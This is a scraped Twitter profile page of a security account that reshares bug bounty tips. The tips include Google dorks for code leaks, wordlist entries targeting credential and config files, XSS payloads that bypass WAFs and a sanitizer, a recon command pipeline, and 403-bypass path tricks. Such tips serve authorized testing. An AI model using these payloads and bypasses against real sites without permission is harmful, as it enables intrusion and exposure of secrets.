
RootMoksha Labs
@rootmoksha
Cybersecurity focussed Bitcoin venture studio
ID: 1721857998941761536
07-11-2023 11:51:59
1,1K Tweet
7,7K Followers
1 Following





Google Dorks - Code Leaks site:pastebin. com "example. com" site:jsfiddle. net "example. com" site:codebeautify. org "example. com" site:codepen. io "example. com" Credits: Mike Takahashi #BugBounty #bugbountytips



Tool To Test Machine Keys In View State 👇 github.com/orwagodfather/… By: Godfather Orwa 🇯🇴 #BugBounty #bugbountytips

Add the file `yahoo_site_admin/credentials/db.conf` to your wordlist, and you might discover some juicy data. Credits:Karim Habeeb #BugBounty #bugbountytips


an XSS payload to bypass some waf & filters in Firefox <input accesskey=X onclick="self['wind'+'ow']['one'+'rror']=alert;throw 1337;"> Credits:Md Ismail Šojal 🕷️ #bugbounty #bugbountytips
![RootMoksha Labs (@rootmoksha) on Twitter photo an XSS payload to bypass some waf & filters in Firefox
<input accesskey=X onclick="self['wind'+'ow']['one'+'rror']=alert;throw 1337;">
Credits:<a href="/0x0SojalSec/">Md Ismail Šojal 🕷️</a>
#bugbounty #bugbountytips an XSS payload to bypass some waf & filters in Firefox
<input accesskey=X onclick="self['wind'+'ow']['one'+'rror']=alert;throw 1337;">
Credits:<a href="/0x0SojalSec/">Md Ismail Šojal 🕷️</a>
#bugbounty #bugbountytips](https://pbs.twimg.com/media/Ga9ClxGa0AAiZn3.png)


If you come across a Windows IIS server, definitely scan the shortname and try to obtain the files by fuzzing, this may allow you to find vulnerabilities like 'CVE-2024-39677: NHibernate SQL Injection Vulnerability ' By:Yunus Emre Öztaş #BugBounty #bugbountytips



"HTML Sanitizer Bypass Cloudflare leads to XSS"🛠️ payload: '<00 foo="<a%20href="javascript:alert('XSS-Bypass')">XSS-CLick</00>--%20/ #bugbountytips by Md Ismail Šojal 🕷️ #BugBounty


Add the file `wp-config.php.txt` to your wordlist, and you might discover some juicy data. #bugbountytips by Karim Habeeb #BugBounty



Use Uncover for recon purposes uncover -q http.title:"GitLab" -silent | httpx -silent | nuclei uncover -q target -f ip | naabu echo jira | uncover -e shodan,censys -silent #bugbountytips by:infosecresearcher #BugBounty


403 bypass methodology ! 1- using space symbols exmaple: /admin -> 403 /admin%09 -> 200 /admin%20 -> 200 2- use traversal Example: /admin -> 403 /..;/admin -> 200 you can fuzz with traversal sometimes that's end with results Example: /..;/FUZZ #bugbountytips by VIEH Group

